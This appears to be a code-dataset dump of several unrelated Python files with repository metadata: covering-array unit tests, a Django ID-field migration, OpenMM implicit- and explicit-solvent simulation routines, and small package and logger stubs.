[3, 6, 2, 5],
[4, 0, 3, 6],
[5, 1, 4, 0],
[6, 2, 5, 1],
[0, 3, 6, 2],
[1, 4, 0, 3],
[5, 2, 6, 3],
[6, 3, 0, 4],
[0, 4, 1, 5],
[1, 5, 2, 6],
[2, 6, 3, 0],
[3, 0, 4, 1],
[4, 1, 5, 2],
[1, 6, 4, 2],
[2, 0, 5, 3],
[3, 1, 6, 4],
[4, 2, 0, 5],
[5, 3, 1, 6],
[6, 4, 2, 0],
[0, 5, 3, 1],
[4, 3, 2, 1],
[5, 4, 3, 2],
[6, 5, 4, 3],
[0, 6, 5, 4],
[1, 0, 6, 5],
[2, 1, 0, 6],
[3, 2, 1, 0],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations8():
ps = ParameterSet.create_from_parm_and_value_sizes(9, 6)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[0, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 2, 2, 2, 2, 2, 2, 2, 2],
[0, 3, 3, 3, 3, 3, 3, 3, 3],
[0, 4, 4, 4, 4, 4, 4, 4, 4],
[0, 5, 5, 5, 5, 5, 5, 5, 5],
[0, 6, 6, 6, 6, 6, 6, 6, 6],
[0, 0, 0, 1, 2, 3, 4, 5, 6],
[0, 0, 0, 2, 1, 4, 3, 6, 5],
[0, 1, 2, 0, 0, 5, 6, 3, 4],
[0, 2, 1, 0, 0, 6, 5, 4, 3],
[0, 3, 4, 5, 6, 0, 0, 1, 2],
[0, 4, 3, 6, 5, 0, 0, 2, 1],
[0, 5, 6, 3, 4, 1, 2, 0, 0],
[0, 6, 5, 4, 3, 2, 1, 0, 0],
[1, 0, 1, 3, 5, 2, 0, 6, 4],
[1, 0, 2, 4, 6, 1, 0, 5, 3],
[1, 1, 0, 5, 3, 0, 2, 4, 6],
[1, 2, 0, 6, 4, 0, 1, 3, 5],
[1, 3, 5, 0, 1, 6, 4, 2, 0],
[1, 4, 6, 0, 2, 5, 3, 1, 0],
[1, 5, 3, 1, 0, 4, 6, 0, 2],
[1, 6, 4, 2, 0, 3, 5, 0, 1],
[2, 0, 2, 5, 4, 6, 3, 0, 1],
[2, 0, 1, 6, 3, 5, 4, 0, 2],
[2, 1, 0, 3, 6, 4, 5, 2, 0],
[2, 2, 0, 4, 5, 3, 6, 1, 0],
[2, 3, 6, 1, 0, 2, 0, 4, 5],
[2, 4, 5, 2, 0, 1, 0, 3, 6],
[2, 5, 4, 0, 2, 0, 1, 6, 3],
[2, 6, 3, 0, 1, 0, 2, 5, 4],
[3, 0, 3, 2, 6, 5, 1, 4, 0],
[3, 0, 4, 1, 5, 6, 2, 3, 0],
[3, 1, 5, 0, 4, 3, 0, 6, 2],
[3, 2, 6, 0, 3, 4, 0, 5, 1],
[3, 3, 0, 6, 2, 1, 5, 0, 4],
[3, 4, 0, 5, 1, 2, 6, 0, 3],
[3, 5, 1, 4, 0, 0, 3, 2, 6],
[3, 6, 2, 3, 0, 0, 4, 1, 5],
[4, 0, 4, 0, 3, 1, 6, 2, 5],
[4, 0, 3, 0, 4, 2, 5, 1, 6],
[4, 1, 6, 2, 5, 0, 4, 0, 3],
[4, 2, 5, 1, 6, 0, 3, 0, 4],
[4, 3, 0, 4, 0, 5, 2, 6, 1],
[4, 4, 0, 3, 0, 6, 1, 5, 2],
[4, 5, 2, 6, 1, 3, 0, 4, 0],
[4, 6, 1, 5, 2, 4, 0, 3, 0],
[5, 0, 5, 6, 0, 4, 2, 1, 3],
[5, 0, 6, 5, 0, 3, 1, 2, 4],
[5, 1, 3, 4, 2, 6, 0, 0, 5],
[5, 2, 4, 3, 1, 5, 0, 0, 6],
[5, 3, 1, 2, 4, 0, 6, 5, 0],
[5, 4, 2, 1, 3, 0, 5, 6, 0],
[5, 5, 0, 0, 6, 2, 4, 3, 1],
[5, 6, 0, 0, 5, 1, 3, 4, 2],
[6, 0, 6, 4, 1, 0, 5, 3, 2],
[6, 0, 5, 3, 2, 0, 6, 4, 1],
[6, 1, 4, 6, 0, 2, 3, 5, 0],
[6, 2, 3, 5, 0, 1, 4, 6, 0],
[6, 3, 2, 0, 5, 4, 1, 0, 6],
[6, 4, 1, 0, 6, 3, 2, 0, 5],
[6, 5, 0, 2, 3, 6, 0, 1, 4],
[6, 6, 0, 1, 4, 5, 0, 2, 3],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations9():
ps = ParameterSet.create_from_parm_and_value_sizes(16, 2)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1],
[2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 1],
[2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 0],
[2, 2, 2, 2, 2, 2, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1],
[1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 1, 1, 2, 2, 2, 0],
[2, 2, 2, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2],
[2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations10():
ps = ParameterSet.create_from_parm_and_value_sizes(32, 2)
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
            [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
            [2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 1, 1],
            [1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 1, 1, 1],
            [2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 2, 2, 1, 0, 0, 0],
            [2, 2, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 1, 1],
            [2, 2, 2, 2, 2, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 1, 1, 2, 2, 2, 0, 0, 0],
            [1, 1, 2, 2, 2, 2, 2, 2, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 1, 1, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1],
            [1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 0],
            [2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 1],
            [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 2, 2],
            [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 2],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations11():
ps = ParameterSet.create_from_value_sizes([6, 6, 8, 6])
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3],
[4, 4, 4, 4],
[5, 5, 5, 5],
[6, 6, 6, 6],
[0, 0, 7, 0],
[4, 5, 6, 0],
[5, 6, 7, 1],
[6, 0, 1, 2],
[0, 1, 2, 3],
[1, 2, 3, 4],
[2, 3, 4, 5],
[3, 4, 5, 6],
[0, 2, 4, 6],
[1, 3, 5, 0],
[2, 4, 6, 1],
[3, 5, 7, 2],
[4, 6, 1, 3],
[5, 0, 2, 4],
[6, 1, 3, 5],
[3, 6, 2, 5],
[4, 0, 3, 6],
[5, 1, 4, 0],
[6, 2, 5, 1],
[0, 3, 6, 2],
[1, 4, 7, 3],
[2, 5, 1, 4],
[6, 3, 7, 4],
[0, 4, 1, 5],
[1, 5, 2, 6],
[2, 6, 3, 0],
[3, 0, 4, 1],
[4, 1, 5, 2],
[5, 2, 6, 3],
[2, 0, 5, 3],
[3, 1, 6, 4],
[4, 2, 7, 5],
[5, 3, 1, 6],
[6, 4, 2, 0],
[0, 5, 3, 1],
[1, 6, 4, 2],
[5, 4, 3, 2],
[6, 5, 4, 3],
[0, 6, 5, 4],
[1, 0, 6, 5],
[2, 1, 7, 6],
[3, 2, 1, 0],
[4, 3, 2, 1],
[1, 1, 8, 1],
[2, 2, 8, 2],
[3, 3, 8, 3],
[4, 4, 8, 4],
[5, 5, 8, 5],
[6, 6, 8, 6],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
def test_generate_configurations_web_example():
ps = ParameterSet.create_from_value_sizes([3, 8, 2, 2])
gen = RecursiveGenerator(ps, 2)
cs = gen.generate_covering_array()
cs_expected = np.array(
[
[1, 1, 1, 1],
[1, 2, 2, 2],
[1, 3, 0, 0],
[2, 1, 2, 0],
[2, 2, 0, 1],
[2, 3, 1, 2],
[3, 1, 0, 2],
[3, 2, 1, 0],
[3, 3, 2, 1],
[1, 4, 1, 1],
[2, 4, 2, 2],
[3, 4, 0, 0],
[1, 5, 1, 1],
[2, 5, 2, 2],
[3, 5, 0, 0],
[1, 6, 1, 1],
[2, 6, 2, 2],
[3, 6, 0, 0],
[1, 7, 1, 1],
[2, 7, 2, 2],
[3, 7, 0, 0],
[1, 8, 1, 1],
[2, 8, 2, 2],
[3, 8, 0, 0],
],
dtype=DEFAULT_NDARRAY_TYPE,
)
assert np.array_equal(cs, cs_expected)
| 23.796044
| 64
| 0.237702
| 2,413
| 19,251
| 1.828429
| 0.028595
| 0.126927
| 0.126473
| 0.127833
| 0.821623
| 0.769719
| 0.733228
| 0.704896
| 0.63146
| 0.606754
| 0
| 0.267951
| 0.61441
| 19,251
| 808
| 65
| 23.825495
| 0.326418
| 0.004
| 0
| 0.711052
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015979
| 1
| 0.015979
| false
| 0
| 0.003995
| 0
| 0.019973
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 99061f4967a3b849d2bc40f36354244f8748821b
| 188
| py
| Python
| multiworld/world/__init__.py
| corl2019metaworld/metaworld
| 46d54644915a7d80d3f4206e2e5abe1ccbdb5393
| ["MIT"] | null | null | null
| multiworld/world/__init__.py
| corl2019metaworld/metaworld
| 46d54644915a7d80d3f4206e2e5abe1ccbdb5393
| ["MIT"] | null | null | null
| multiworld/world/__init__.py
| corl2019metaworld/metaworld
| 46d54644915a7d80d3f4206e2e5abe1ccbdb5393
| ["MIT"] | null | null | null |
from multiworld.world.world import POMDPDescriptor
from multiworld.world.world import BaseWorld
from multiworld.world.world import World
from multiworld.world.world import ParametricWorld
| 37.6
| 50
| 0.87234
| 24
| 188
| 6.833333
| 0.291667
| 0.341463
| 0.463415
| 0.585366
| 0.731707
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 188
| 4
| 51
| 47
| 0.953488
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 8
| 54eeb30a0c5223a5881be93581ee3d266bf85509
| 2,591
| py
| Python
| Instanssi/kompomaatti/migrations/0006_auto_20210511_0020.py
| Instanssi/Instanssi.org
| 108b596c6663a3317adfe76bd537d4f05256261d
| ["MIT"] | 6
| 2015-04-03T12:15:02.000Z
| 2019-05-29T07:56:11.000Z
| Instanssi/kompomaatti/migrations/0006_auto_20210511_0020.py
| Instanssi/Instanssi.org
| 108b596c6663a3317adfe76bd537d4f05256261d
| ["MIT"] | 52
| 2015-03-04T21:15:48.000Z
| 2022-03-21T20:16:24.000Z
| Instanssi/kompomaatti/migrations/0006_auto_20210511_0020.py
| Instanssi/Instanssi.org
| 108b596c6663a3317adfe76bd537d4f05256261d
| ["MIT"] | 6
| 2017-09-26T00:52:51.000Z
| 2020-02-17T17:24:21.000Z |
# Generated by Django 3.2.2 on 2021-05-10 21:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('kompomaatti', '0005_entry_platform'),
]
operations = [
migrations.AlterField(
model_name='competition',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='competitionparticipation',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='compo',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='entry',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='entrycollection',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='event',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='profile',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='ticketvotecode',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='vote',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='votecoderequest',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='votegroup',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| 37.550725
| 111
| 0.604014
| 259
| 2,591
| 5.864865
| 0.185328
| 0.086899
| 0.18104
| 0.210007
| 0.806452
| 0.806452
| 0.806452
| 0.806452
| 0.806452
| 0.806452
| 0
| 0.010123
| 0.275569
| 2,591
| 68
| 112
| 38.102941
| 0.799148
| 0.017368
| 0
| 0.709677
| 1
| 0
| 0.073899
| 0.009434
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016129
| 0
| 0.064516
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 54f1a39aa007557fdfed818ed2d5bb021bb90ac8
| 11,784
| py
| Python
| MD_exps/MD_utils_adrp/openmm_simulation.py
| DeepDriveMD/DeepDriveMD
| e0837a3c3a8eb69e0068e5dec0db00a174bae325
| ["MIT"] | null | null | null
| MD_exps/MD_utils_adrp/openmm_simulation.py
| DeepDriveMD/DeepDriveMD
| e0837a3c3a8eb69e0068e5dec0db00a174bae325
| ["MIT"] | null | null | null
| MD_exps/MD_utils_adrp/openmm_simulation.py
| DeepDriveMD/DeepDriveMD
| e0837a3c3a8eb69e0068e5dec0db00a174bae325
| ["MIT"] | 2
| 2021-08-18T13:42:32.000Z
| 2021-11-08T19:56:28.000Z |
import os
import time
import glob
import shutil
import random
import numpy as np
import parmed as pmd
import simtk.openmm.app as app
import simtk.openmm as omm
import simtk.unit as u
from MD_utils.openmm_reporter import ContactMapReporter
from MD_utils.utils import create_md_path, touch_file
def openmm_simulate_amber_implicit(
pdb_file,
top_file=None,
check_point=None,
GPU_index=0,
output_traj="output.dcd",
output_log="output.log",
output_cm=None,
report_time=10*u.picoseconds,
sim_time=10*u.nanoseconds,
reeval_time=None,
):
"""
    Start and run an OpenMM NVT simulation with a Langevin integrator at a 2 fs
    time step and 300 K. The cutoff distance for nonbonded interactions was
    set at 1.2 nm and the LJ switch distance at 1.0 nm, which is commonly used
    with the Amber force field. Long-range nonbonded interactions were handled
    with PME.
Parameters
----------
    pdb_file : coordinates file (.gro, .pdb, ...)
        This is the molecule configuration file that contains all the atom
        positions and the PBC (periodic boundary condition) box of the system.
    check_point : None or check point file to load
    GPU_index : Int or Str
        The device index of the GPU to use for running the simulation. Use a
        string such as '0,1' to use more than one GPU.
    output_traj : the trajectory file (.dcd)
        This is the file that stores all the coordinate information of the MD
        simulation results.
output_log : the log file (.log)
This file stores the MD simulation status, such as steps, time, potential
energy, temperature, speed, etc.
output_cm : the h5 file contains contact map information
report_time : 10 ps
The program writes its information to the output every 10 ps by default
sim_time : 10 ns
The timespan of the simulation trajectory
"""
# set up save dir for simulation results
work_dir = os.getcwd()
time_label = int(time.time())
omm_path = create_md_path(time_label)
print(f"Running simulation at {omm_path}")
# setting up running path
os.chdir(omm_path)
if top_file:
pdb = pmd.load_file(top_file, xyz = pdb_file)
shutil.copy2(top_file, './')
system = pdb.createSystem(nonbondedMethod=app.CutoffNonPeriodic,
nonbondedCutoff=1.0*u.nanometer, constraints=app.HBonds,
implicitSolvent=app.OBC1)
else:
pdb = pmd.load_file(pdb_file)
forcefield = app.ForceField('amber99sbildn.xml', 'amber99_obc.xml')
system = forcefield.createSystem(pdb.topology,
nonbondedMethod=app.CutoffNonPeriodic,
nonbondedCutoff=1.0*u.nanometer, constraints=app.HBonds)
dt = 0.002*u.picoseconds
integrator = omm.LangevinIntegrator(300*u.kelvin, 91.0/u.picosecond, dt)
integrator.setConstraintTolerance(0.00001)
try:
platform = omm.Platform_getPlatformByName("CUDA")
properties = {'DeviceIndex': str(GPU_index), 'CudaPrecision': 'mixed'}
except Exception:
platform = omm.Platform_getPlatformByName("OpenCL")
properties = {'DeviceIndex': str(GPU_index)}
simulation = app.Simulation(pdb.topology, system, integrator, platform, properties)
if pdb.get_coordinates().shape[0] == 1:
simulation.context.setPositions(pdb.positions)
shutil.copy2(pdb_file, './')
else:
positions = random.choice(pdb.get_coordinates())
simulation.context.setPositions(positions/10)
            # ParmEd coordinates are in angstroms; OpenMM expects nanometers, hence /10
pdb.write_pdb('start.pdb', coordinates=positions)
# equilibrate
simulation.minimizeEnergy()
simulation.context.setVelocitiesToTemperature(300*u.kelvin, random.randint(1, 10000))
simulation.step(int(100*u.picoseconds / (2*u.femtoseconds)))
# setting up reports
report_freq = int(report_time/dt)
simulation.reporters.append(app.DCDReporter(output_traj, report_freq))
if output_cm:
simulation.reporters.append(ContactMapReporter(output_cm, report_freq))
simulation.reporters.append(app.StateDataReporter(output_log,
report_freq, step=True, time=True, speed=True,
potentialEnergy=True, temperature=True, totalEnergy=True))
simulation.reporters.append(app.CheckpointReporter('checkpnt.chk', report_freq))
if check_point:
simulation.loadCheckpoint(check_point)
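    # With reeval_time set, the trajectory runs in chunks; between chunks the
    # loop polls for a '../halt' sentinel (stop entirely) or a 'new_pdb' file
    # (restart the simulation from coordinates supplied by an external process).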
if reeval_time:
nsteps = int(reeval_time/dt)
niter = int(sim_time/reeval_time)
for i in range(niter):
if os.path.exists('../halt'):
return
elif os.path.exists('new_pdb'):
print("Found new.pdb, starting new sim...")
# cleaning up old runs
del simulation
# starting new simulation with new pdb
with open('new_pdb', 'r') as fp:
new_pdb = fp.read().split()[0]
os.chdir(work_dir)
openmm_simulate_amber_implicit(
new_pdb, top_file=top_file,
check_point=None,
GPU_index=GPU_index,
output_traj=output_traj,
output_log=output_log,
output_cm=output_cm,
report_time=report_time,
sim_time=sim_time,
reeval_time=reeval_time,
)
else:
simulation.step(nsteps)
else:
nsteps = int(sim_time/dt)
simulation.step(nsteps)
os.chdir(work_dir)
if not os.path.exists('../halt'):
openmm_simulate_amber_implicit(
pdb_file, top_file=top_file,
check_point=None,
GPU_index=GPU_index,
output_traj=output_traj,
output_log=output_log,
output_cm=output_cm,
report_time=report_time,
sim_time=sim_time,
reeval_time=reeval_time,
)
else:
return
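# A minimal usage sketch (hypothetical file names, not part of the original
# module): run a 10 ns implicit-solvent simulation on GPU 0, reporting every
# 50 ps and polling for halt/new_pdb signals every 1 ns.
# openmm_simulate_amber_implicit(
#     "comp.pdb",
#     top_file="comp.top",
#     GPU_index=0,
#     output_traj="output.dcd",
#     output_log="output.log",
#     output_cm="output_cm.h5",
#     report_time=50*u.picoseconds,
#     sim_time=10*u.nanoseconds,
#     reeval_time=1*u.nanoseconds,
# )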
def openmm_simulate_amber_explicit(
pdb_file,
top_file=None,
check_point=None,
GPU_index=0,
output_traj="output.dcd",
output_log="output.log",
output_cm=None,
report_time=10*u.picoseconds,
sim_time=10*u.nanoseconds,
reeval_time=None,
):
"""
    Start and run an OpenMM NPT simulation with a Langevin integrator at a 2 fs
    time step and 300 K. The cutoff distance for nonbonded interactions was
    set at 1.0 nm, which is commonly used with the Amber force field. Long-range
    nonbonded interactions were handled with PME.
Parameters
----------
    top_file : topology file (.top, .prmtop, ...)
        This is the topology file that describes all the interactions within
        the MD system.
    pdb_file : coordinates file (.gro, .pdb, ...)
        This is the molecule configuration file that contains all the atom
        positions and the PBC (periodic boundary condition) box of the system.
    GPU_index : Int or Str
        The device index of the GPU to use for running the simulation. Use a
        string such as '0,1' to use more than one GPU.
    output_traj : the trajectory file (.dcd)
        This is the file that stores all the coordinate information of the MD
        simulation results.
output_log : the log file (.log)
This file stores the MD simulation status, such as steps, time, potential
energy, temperature, speed, etc.
report_time : 10 ps
The program writes its information to the output every 10 ps by default
sim_time : 10 ns
The timespan of the simulation trajectory
"""
# set up save dir for simulation results
work_dir = os.getcwd()
time_label = int(time.time())
omm_path = create_md_path(time_label)
print(f"Running simulation at {omm_path}")
# setting up running path
os.chdir(omm_path)
top = pmd.load_file(top_file, xyz = pdb_file)
system = top.createSystem(nonbondedMethod=app.PME, nonbondedCutoff=1*u.nanometer,
constraints=app.HBonds)
dt = 0.002*u.picoseconds
integrator = omm.LangevinIntegrator(300*u.kelvin, 1/u.picosecond, dt)
system.addForce(omm.MonteCarloBarostat(1*u.bar, 300*u.kelvin))
try:
platform = omm.Platform_getPlatformByName("CUDA")
properties = {'DeviceIndex': str(GPU_index), 'CudaPrecision': 'mixed'}
except Exception:
platform = omm.Platform_getPlatformByName("OpenCL")
properties = {'DeviceIndex': str(GPU_index)}
simulation = app.Simulation(top.topology, system, integrator, platform, properties)
# simulation.context.setPositions(top.positions)
if top.get_coordinates().shape[0] == 1:
simulation.context.setPositions(top.positions)
shutil.copy2(pdb_file, './')
else:
positions = random.choice(top.get_coordinates())
simulation.context.setPositions(positions/10)
            # ParmEd coordinates are in angstroms; OpenMM expects nanometers, hence /10
top.write_pdb('start.pdb', coordinates=positions)
simulation.minimizeEnergy()
simulation.context.setVelocitiesToTemperature(300*u.kelvin, random.randint(1, 10000))
simulation.step(int(100*u.picoseconds / (2*u.femtoseconds)))
report_freq = int(report_time/dt)
simulation.reporters.append(app.DCDReporter(output_traj, report_freq))
if output_cm:
simulation.reporters.append(ContactMapReporter(output_cm, report_freq))
simulation.reporters.append(app.StateDataReporter(output_log,
report_freq, step=True, time=True, speed=True,
potentialEnergy=True, temperature=True, totalEnergy=True))
simulation.reporters.append(app.CheckpointReporter('checkpnt.chk', report_freq))
if check_point:
simulation.loadCheckpoint(check_point)
if reeval_time:
nsteps = int(reeval_time/dt)
niter = int(sim_time/reeval_time)
for i in range(niter):
if os.path.exists('../halt'):
return
elif os.path.exists('new_pdb'):
print("Found new.pdb, starting new sim...")
# cleaning up old runs
del simulation
# starting new simulation with new pdb
with open('new_pdb', 'r') as fp:
new_pdb = fp.read().split()[0]
os.chdir(work_dir)
openmm_simulate_amber_explicit(
new_pdb, top_file=top_file,
check_point=None,
GPU_index=GPU_index,
output_traj=output_traj,
output_log=output_log,
output_cm=output_cm,
report_time=report_time,
sim_time=sim_time,
reeval_time=reeval_time,
)
else:
simulation.step(nsteps)
else:
nsteps = int(sim_time/dt)
simulation.step(nsteps)
os.chdir(work_dir)
if not os.path.exists('../halt'):
openmm_simulate_amber_explicit(
pdb_file, top_file=top_file,
check_point=None,
GPU_index=GPU_index,
output_traj=output_traj,
output_log=output_log,
output_cm=output_cm,
report_time=report_time,
sim_time=sim_time,
reeval_time=reeval_time,
)
else:
return
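# Analogous usage sketch for the explicit-solvent (NPT) variant; note that
# top_file is effectively required here because the topology is always loaded.
# File names below are hypothetical.
# openmm_simulate_amber_explicit(
#     "comp.pdb",
#     top_file="comp.prmtop",
#     GPU_index=0,
#     output_traj="output.dcd",
#     output_log="output.log",
#     report_time=50*u.picoseconds,
#     sim_time=10*u.nanoseconds,
# )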
| 36.482972
| 89
| 0.617447
| 1,401
| 11,784
| 5.037116
| 0.174875
| 0.016863
| 0.025507
| 0.014454
| 0.873034
| 0.854896
| 0.844693
| 0.8386
| 0.80119
| 0.786453
| 0
| 0.014509
| 0.298116
| 11,784
| 322
| 90
| 36.596273
| 0.838714
| 0.236507
| 0
| 0.779904
| 0
| 0
| 0.046836
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009569
| false
| 0
| 0.057416
| 0
| 0.086124
| 0.019139
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 07429d68a919ac500760ee0db25b77eb02246db9
| 91
| py
| Python
| tools/wptserve/wptserve/logger.py
| meyerweb/wpt
| f04261533819893c71289614c03434c06856c13e
| ["BSD-3-Clause"] | 14,668
| 2015-01-01T01:57:10.000Z
| 2022-03-31T23:33:32.000Z
| tools/wptserve/wptserve/logger.py
| meyerweb/wpt
| f04261533819893c71289614c03434c06856c13e
| ["BSD-3-Clause"] | 7,642
| 2018-05-28T09:38:03.000Z
| 2022-03-31T20:55:48.000Z
| tools/wptserve/wptserve/logger.py
| meyerweb/wpt
| f04261533819893c71289614c03434c06856c13e
| ["BSD-3-Clause"] | 5,941
| 2015-01-02T11:32:21.000Z
| 2022-03-31T16:35:46.000Z |
import logging
def get_logger():
# Use the root logger
return logging.getLogger()
| 15.166667
| 30
| 0.703297
| 12
| 91
| 5.25
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.21978
| 91
| 5
| 31
| 18.2
| 0.887324
| 0.208791
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 7
| ab5ed83dee6de6a5cc67a07b1643606daac9d2fe
| 45
| py
| Python
| test_fitacola.py
| luismsmendonca/fitacola
| 247ae5113687c5fd457c7aa4d9464b0c83a51d9d
| ["MIT"] | null | null | null
| test_fitacola.py
| luismsmendonca/fitacola
| 247ae5113687c5fd457c7aa4d9464b0c83a51d9d
| ["MIT"] | null | null | null
| test_fitacola.py
| luismsmendonca/fitacola
| 247ae5113687c5fd457c7aa4d9464b0c83a51d9d
| ["MIT"] | null | null | null |
import pytest
def test_fitacola():
pass
| 9
| 20
| 0.711111
| 6
| 45
| 5.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 45
| 4
| 21
| 11.25
| 0.885714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 8
